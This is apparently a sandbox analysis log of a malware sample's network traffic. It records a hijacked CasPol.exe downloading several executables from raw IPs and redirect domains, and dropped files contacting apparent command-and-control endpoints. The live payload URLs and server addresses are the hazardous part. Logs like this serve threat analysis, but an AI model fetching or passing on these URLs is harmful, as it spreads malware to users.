                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                  Content-Type: application/x-msdos-program
                                                                                                                                                                                                                                                                • flag-ru
                                                                                                                                                                                                                                                                  GET
                                                                                                                                                                                                                                                                  http://5.42.96.64/server/ww12/AppGate2103v01.exe
                                                                                                                                                                                                                                                                  CasPol.exe
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  5.42.96.64:80
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  GET /server/ww12/AppGate2103v01.exe HTTP/1.1
                                                                                                                                                                                                                                                                  Host: 5.42.96.64
                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                  HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Server: nginx/1.22.1
                                                                                                                                                                                                                                                                  Date: Sat, 11 May 2024 22:39:55 GMT
                                                                                                                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                                                                                                                  Content-Length: 1449760
                                                                                                                                                                                                                                                                  Last-Modified: Fri, 10 May 2024 14:30:10 GMT
                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                  ETag: "663e2f72-161f20"
                                                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                                                • flag-ru
                                                                                                                                                                                                                                                                  GET
                                                                                                                                                                                                                                                                  http://5.42.96.78/files/setup.exe
                                                                                                                                                                                                                                                                  CasPol.exe
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  5.42.96.78:80
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  GET /files/setup.exe HTTP/1.1
                                                                                                                                                                                                                                                                  Host: 5.42.96.78
                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                  HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Date: Sat, 11 May 2024 22:39:55 GMT
                                                                                                                                                                                                                                                                  Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                                                                  Last-Modified: Fri, 10 May 2024 08:32:14 GMT
                                                                                                                                                                                                                                                                  ETag: "63fa73-618155f6aed8b"
                                                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                                                  Content-Length: 6552179
                                                                                                                                                                                                                                                                  Keep-Alive: timeout=5, max=100
                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                  Content-Type: application/x-msdownload
                                                                                                                                                                                                                                                                • flag-us
                                                                                                                                                                                                                                                                  GET
                                                                                                                                                                                                                                                                  https://onlycitylink.com/baf14778c246e15550645e30ba78ce1c.exe
                                                                                                                                                                                                                                                                  CasPol.exe
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  172.67.182.192:443
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  GET /baf14778c246e15550645e30ba78ce1c.exe HTTP/1.1
                                                                                                                                                                                                                                                                  Host: onlycitylink.com
                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                  HTTP/1.1 307 Temporary Redirect
                                                                                                                                                                                                                                                                  Date: Sat, 11 May 2024 22:39:55 GMT
                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                  Location: https://firstfirecar.com/c1c0442216217cdebb073c3e11f975df/baf14778c246e15550645e30ba78ce1c.exe
                                                                                                                                                                                                                                                                  CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HhtuYMfjby2uLSnYSqnNNQzTvTbustcnjpNabthnIuOulO%2F%2FyaZ8UAMdUtxM2kAL9u3QH0DeD5CRuLIjvhMn7PgtTZ6%2BrDn26jIBdAmTodpnTRnbzf7qtgdAJj5XY56r7402"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                                                                  CF-RAY: 8825aaf24e447765-LHR
                                                                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                • flag-us
                                                                                                                                                                                                                                                                  GET
                                                                                                                                                                                                                                                                  https://realdeepai.org/6779d89b7a368f4f3f340b50a9d18d71.exe
                                                                                                                                                                                                                                                                  CasPol.exe
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  104.21.90.14:443
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  GET /6779d89b7a368f4f3f340b50a9d18d71.exe HTTP/1.1
                                                                                                                                                                                                                                                                  Host: realdeepai.org
                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                  HTTP/1.1 307 Temporary Redirect
                                                                                                                                                                                                                                                                  Date: Sat, 11 May 2024 22:39:55 GMT
                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                  Location: https://jonathantwo.com/c1c0442216217cdebb073c3e11f975df/6779d89b7a368f4f3f340b50a9d18d71.exe
                                                                                                                                                                                                                                                                  CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nWzd62fQ7X7uxVE5909qji6aevdqgCsFgDbgtlTd2I2D%2BmPvrQ2%2BFfmgVTdApBDqvld6WWrdW9xHbrZRG%2FUuEiIq786KeknRRsL5wp6PgvghYT%2FMdo%2BR0N6IweZIwrmXvA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                                                                  CF-RAY: 8825aaf249f006d5-LHR
                                                                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                • flag-us
                                                                                                                                                                                                                                                                  GET
                                                                                                                                                                                                                                                                  https://onlycitylink.com/baf14778c246e15550645e30ba78ce1c.exe
                                                                                                                                                                                                                                                                  CasPol.exe
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  172.67.182.192:443
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  GET /baf14778c246e15550645e30ba78ce1c.exe HTTP/1.1
                                                                                                                                                                                                                                                                  Host: onlycitylink.com
                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                  HTTP/1.1 307 Temporary Redirect
                                                                                                                                                                                                                                                                  Date: Sat, 11 May 2024 22:39:55 GMT
                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                  Location: https://firstfirecar.com/c1c0442216217cdebb073c3e11f975df/baf14778c246e15550645e30ba78ce1c.exe
                                                                                                                                                                                                                                                                  CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LrD4GZu%2F022yDsciwNEy42D4RzZQ21kBV4LPheNxaj8dM4Y6XGUli4RGYkhn4Uadxe1JGWcBxSOPZp3Y9fHWP55lb3ggED2DXj4Leko%2BnLdL39%2F7UNlQdNmfyymRPk6Qq8%2FM"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                                                                  CF-RAY: 8825aaf26881631f-LHR
                                                                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                • flag-ru
                                                                                                                                                                                                                                                                  GET
                                                                                                                                                                                                                                                                  http://5.42.96.78/files/setup.exe
                                                                                                                                                                                                                                                                  CasPol.exe
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  5.42.96.78:80
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  GET /files/setup.exe HTTP/1.1
                                                                                                                                                                                                                                                                  Host: 5.42.96.78
                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                  HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Date: Sat, 11 May 2024 22:39:55 GMT
                                                                                                                                                                                                                                                                  Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                                                                  Last-Modified: Fri, 10 May 2024 08:32:14 GMT
                                                                                                                                                                                                                                                                  ETag: "63fa73-618155f6aed8b"
                                                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                                                  Content-Length: 6552179
                                                                                                                                                                                                                                                                  Keep-Alive: timeout=5, max=100
                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                  Content-Type: application/x-msdownload
                                                                                                                                                                                                                                                                • flag-az
                                                                                                                                                                                                                                                                  GET
                                                                                                                                                                                                                                                                  http://1xst.ru/tech/upd2.php
                                                                                                                                                                                                                                                                  CasPol.exe
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  185.18.245.58:80
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  GET /tech/upd2.php HTTP/1.1
                                                                                                                                                                                                                                                                  Host: 1xst.ru
                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                • flag-us
                                                                                                                                                                                                                                                                  GET
                                                                                                                                                                                                                                                                  https://realdeepai.org/6779d89b7a368f4f3f340b50a9d18d71.exe
                                                                                                                                                                                                                                                                  CasPol.exe
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  104.21.90.14:443
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  GET /6779d89b7a368f4f3f340b50a9d18d71.exe HTTP/1.1
                                                                                                                                                                                                                                                                  Host: realdeepai.org
                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                  HTTP/1.1 307 Temporary Redirect
                                                                                                                                                                                                                                                                  Date: Sat, 11 May 2024 22:39:55 GMT
                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                  Location: https://jonathantwo.com/c1c0442216217cdebb073c3e11f975df/6779d89b7a368f4f3f340b50a9d18d71.exe
                                                                                                                                                                                                                                                                  CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YIVCF5h2mAEH94dgjuQr9PgcI0DYPSPVN7j60z0JK6uFOdFpbA4%2FdZVI%2FohHsGpSeULq8O8tBEsctp%2F%2BdTnHKEyQoj8Xp3Zt%2Bejbbjt479brN5rP%2BcIwY47KlbbkPP9Eyg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                                                                  CF-RAY: 8825aaf27d3c23b2-LHR
                                                                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                • flag-us
                                                                                                                                                                                                                                                                  GET
                                                                                                                                                                                                                                                                  https://jonathantwo.com/c1c0442216217cdebb073c3e11f975df/6779d89b7a368f4f3f340b50a9d18d71.exe
                                                                                                                                                                                                                                                                  CasPol.exe
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  104.21.31.124:443
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  GET /c1c0442216217cdebb073c3e11f975df/6779d89b7a368f4f3f340b50a9d18d71.exe HTTP/1.1
                                                                                                                                                                                                                                                                  Host: jonathantwo.com
                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                  HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Date: Sat, 11 May 2024 22:39:55 GMT
                                                                                                                                                                                                                                                                  Content-Type: application/x-ms-dos-executable
                                                                                                                                                                                                                                                                  Content-Length: 4331392
                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                  Last-Modified: Sat, 11 May 2024 21:43:36 GMT
                                                                                                                                                                                                                                                                  Cache-Control: max-age=14400
                                                                                                                                                                                                                                                                  CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                  Age: 485
                                                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lTG3kw9tC%2Fu5iHS9D4Ul1XGA64A%2BAzfAS60q%2Fdew9Q1raUOso%2FZNyHZRdsSxpt%2FNkl6gUnAVid71H5HpYYmytbvWmdRVYK%2FpdlZEQR0HzYecrH%2BL72Ezmr8i6qbX7kzm73o%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                                                                  CF-RAY: 8825aaf38d4224d8-LHR
                                                                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                • flag-us
                                                                                                                                                                                                                                                                  GET
                                                                                                                                                                                                                                                                  https://jonathantwo.com/c1c0442216217cdebb073c3e11f975df/6779d89b7a368f4f3f340b50a9d18d71.exe
                                                                                                                                                                                                                                                                  CasPol.exe
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  104.21.31.124:443
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  GET /c1c0442216217cdebb073c3e11f975df/6779d89b7a368f4f3f340b50a9d18d71.exe HTTP/1.1
                                                                                                                                                                                                                                                                  Host: jonathantwo.com
                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                  HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Date: Sat, 11 May 2024 22:39:55 GMT
                                                                                                                                                                                                                                                                  Content-Type: application/x-ms-dos-executable
                                                                                                                                                                                                                                                                  Content-Length: 4331392
                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                  Last-Modified: Sat, 11 May 2024 21:43:36 GMT
                                                                                                                                                                                                                                                                  Cache-Control: max-age=14400
                                                                                                                                                                                                                                                                  CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                  Age: 485
                                                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xaAs6L2N6hRJ36BMwhqCe1k3SxgaNsLYEG8cvp7gADr8gU9COvP33RMH8vv1yFmo0pniSILN3uSJ51DOO%2BUoFCnZzr2DZBWbOKZ1ZchoLfo6Gu6s3XKvWPF8zXWR1joJR9U%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                                                                  CF-RAY: 8825aaf37f0423f6-LHR
                                                                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                • flag-us
                                                                                                                                                                                                                                                                  GET
                                                                                                                                                                                                                                                                  https://firstfirecar.com/c1c0442216217cdebb073c3e11f975df/baf14778c246e15550645e30ba78ce1c.exe
                                                                                                                                                                                                                                                                  CasPol.exe
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  104.21.60.76:443
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  GET /c1c0442216217cdebb073c3e11f975df/baf14778c246e15550645e30ba78ce1c.exe HTTP/1.1
                                                                                                                                                                                                                                                                  Host: firstfirecar.com
                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                  HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Date: Sat, 11 May 2024 22:39:55 GMT
                                                                                                                                                                                                                                                                  Content-Type: application/x-ms-dos-executable
                                                                                                                                                                                                                                                                  Content-Length: 4331408
                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                  Last-Modified: Sat, 11 May 2024 21:43:31 GMT
                                                                                                                                                                                                                                                                  Cache-Control: max-age=14400
                                                                                                                                                                                                                                                                  CF-Cache-Status: MISS
                                                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2N0mdXJBeRDwbL8QDSKoLe7LenQVcsnm1WpW2DCeEPwRgWkD8xJ64ErPzeg6cfTVakIS%2F%2ButPlRXgPrVIvW8eANPGdAem8z7C6Iy0ambGOrngtruoHgHUReC8C6U0hw4qYzz"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                                                                  CF-RAY: 8825aaf37c1cdd54-LHR
                                                                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                • flag-us
                                                                                                                                                                                                                                                                  GET
                                                                                                                                                                                                                                                                  https://firstfirecar.com/c1c0442216217cdebb073c3e11f975df/baf14778c246e15550645e30ba78ce1c.exe
                                                                                                                                                                                                                                                                  CasPol.exe
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  104.21.60.76:443
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  GET /c1c0442216217cdebb073c3e11f975df/baf14778c246e15550645e30ba78ce1c.exe HTTP/1.1
                                                                                                                                                                                                                                                                  Host: firstfirecar.com
                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                  HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Date: Sat, 11 May 2024 22:39:55 GMT
                                                                                                                                                                                                                                                                  Content-Type: application/x-ms-dos-executable
                                                                                                                                                                                                                                                                  Content-Length: 4331408
                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                  Last-Modified: Sat, 11 May 2024 21:43:31 GMT
                                                                                                                                                                                                                                                                  Cache-Control: max-age=14400
                                                                                                                                                                                                                                                                  CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                  Age: 763
                                                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LxqFkWx2WQhsrjySjrEhg4kSIy%2BMJ1yHXb%2FurqZifouibaGxXm3xpY76N%2FsfMZ78Cl1Dc%2BmEpV7VXPEVAuJg3lVYGEJkNXBW7SYIyct7x5%2BjHteNeRYvyervlrLxco45nDHk"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                                                                  CF-RAY: 8825aaf37c50654a-LHR
                                                                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                • flag-az
                                                                                                                                                                                                                                                                  GET
                                                                                                                                                                                                                                                                  http://1xst.ru/tech/upd2.php
                                                                                                                                                                                                                                                                  CasPol.exe
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  185.18.245.58:80
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  GET /tech/upd2.php HTTP/1.1
                                                                                                                                                                                                                                                                  Host: 1xst.ru
                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                • flag-us
                                                                                                                                                                                                                                                                  DNS
                                                                                                                                                                                                                                                                  64.96.42.5.in-addr.arpa
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  8.8.8.8:53
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  64.96.42.5.in-addr.arpa
                                                                                                                                                                                                                                                                  IN PTR
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                • flag-us
                                                                                                                                                                                                                                                                  DNS
                                                                                                                                                                                                                                                                  90.128.172.185.in-addr.arpa
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  8.8.8.8:53
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  90.128.172.185.in-addr.arpa
                                                                                                                                                                                                                                                                  IN PTR
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                • flag-us
                                                                                                                                                                                                                                                                  DNS
                                                                                                                                                                                                                                                                  25.173.189.20.in-addr.arpa
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  8.8.8.8:53
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  25.173.189.20.in-addr.arpa
                                                                                                                                                                                                                                                                  IN PTR
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                • flag-us
                                                                                                                                                                                                                                                                  DNS
                                                                                                                                                                                                                                                                  58.245.18.185.in-addr.arpa
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  8.8.8.8:53
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  58.245.18.185.in-addr.arpa
                                                                                                                                                                                                                                                                  IN PTR
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                • flag-us
                                                                                                                                                                                                                                                                  DNS
                                                                                                                                                                                                                                                                  45.87.157.20.in-addr.arpa
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  8.8.8.8:53
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  45.87.157.20.in-addr.arpa
                                                                                                                                                                                                                                                                  IN PTR
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                • flag-us
                                                                                                                                                                                                                                                                  DNS
                                                                                                                                                                                                                                                                  124.31.21.104.in-addr.arpa
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  8.8.8.8:53
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  124.31.21.104.in-addr.arpa
                                                                                                                                                                                                                                                                  IN PTR
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                • flag-us
                                                                                                                                                                                                                                                                  DNS
                                                                                                                                                                                                                                                                  ipinfo.io
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  8.8.8.8:53
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  ipinfo.io
                                                                                                                                                                                                                                                                  IN A
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                  ipinfo.io
                                                                                                                                                                                                                                                                  IN A
                                                                                                                                                                                                                                                                  34.117.186.192
                                                                                                                                                                                                                                                                • flag-us
                                                                                                                                                                                                                                                                  DNS
                                                                                                                                                                                                                                                                  download.iolo.net
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  8.8.8.8:53
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  download.iolo.net
                                                                                                                                                                                                                                                                  IN A
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                  download.iolo.net
                                                                                                                                                                                                                                                                  IN CNAME
                                                                                                                                                                                                                                                                  iolo0.b-cdn.net
                                                                                                                                                                                                                                                                  iolo0.b-cdn.net
                                                                                                                                                                                                                                                                  IN A
                                                                                                                                                                                                                                                                  185.93.2.244
                                                                                                                                                                                                                                                                • flag-us
                                                                                                                                                                                                                                                                  DNS
                                                                                                                                                                                                                                                                  76.60.21.104.in-addr.arpa
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  8.8.8.8:53
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  76.60.21.104.in-addr.arpa
                                                                                                                                                                                                                                                                  IN PTR
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                • flag-us
                                                                                                                                                                                                                                                                  DNS
                                                                                                                                                                                                                                                                  10.66.42.5.in-addr.arpa
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  8.8.8.8:53
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  10.66.42.5.in-addr.arpa
                                                                                                                                                                                                                                                                  IN PTR
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                • flag-us
                                                                                                                                                                                                                                                                  DNS
                                                                                                                                                                                                                                                                  244.2.93.185.in-addr.arpa
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  8.8.8.8:53
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  244.2.93.185.in-addr.arpa
                                                                                                                                                                                                                                                                  IN PTR
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                  244.2.93.185.in-addr.arpa
                                                                                                                                                                                                                                                                  IN PTR
                                                                                                                                                                                                                                                                  185-93-2-244 bunnyinfranet
                                                                                                                                                                                                                                                                • flag-ru
                                                                                                                                                                                                                                                                  GET
                                                                                                                                                                                                                                                                  http://5.42.66.10/api/bing_release.php
                                                                                                                                                                                                                                                                  YPvckKCypmBOW0NpRBKcRmjU.exe
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  5.42.66.10:80
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  GET /api/bing_release.php HTTP/1.1
                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                  Host: 5.42.66.10
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                  HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Date: Sat, 11 May 2024 22:40:01 GMT
                                                                                                                                                                                                                                                                  Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                                                                  X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                                                  Content-Length: 8
                                                                                                                                                                                                                                                                  Keep-Alive: timeout=5, max=100
                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                • flag-de
                                                                                                                                                                                                                                                                  GET
                                                                                                                                                                                                                                                                  http://185.172.128.90/cpa/ping.php?substr=five&s=ab&sub=0
                                                                                                                                                                                                                                                                  dH6oPXkyyyDL7hNf3xeAvCZ9.exe
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  185.172.128.90:80
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  GET /cpa/ping.php?substr=five&s=ab&sub=0 HTTP/1.1
                                                                                                                                                                                                                                                                  Host: 185.172.128.90
                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                  HTTP/1.0 500 Internal Server Error
                                                                                                                                                                                                                                                                  Date: Sat, 11 May 2024 22:40:05 GMT
                                                                                                                                                                                                                                                                  Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                                                                                                                                                  Content-Length: 0
                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                • flag-de
                                                                                                                                                                                                                                                                  GET
                                                                                                                                                                                                                                                                  http://185.172.128.228/ping.php?substr=five
                                                                                                                                                                                                                                                                  dH6oPXkyyyDL7hNf3xeAvCZ9.exe
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  185.172.128.228:80
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  GET /ping.php?substr=five HTTP/1.1
                                                                                                                                                                                                                                                                  Host: 185.172.128.228
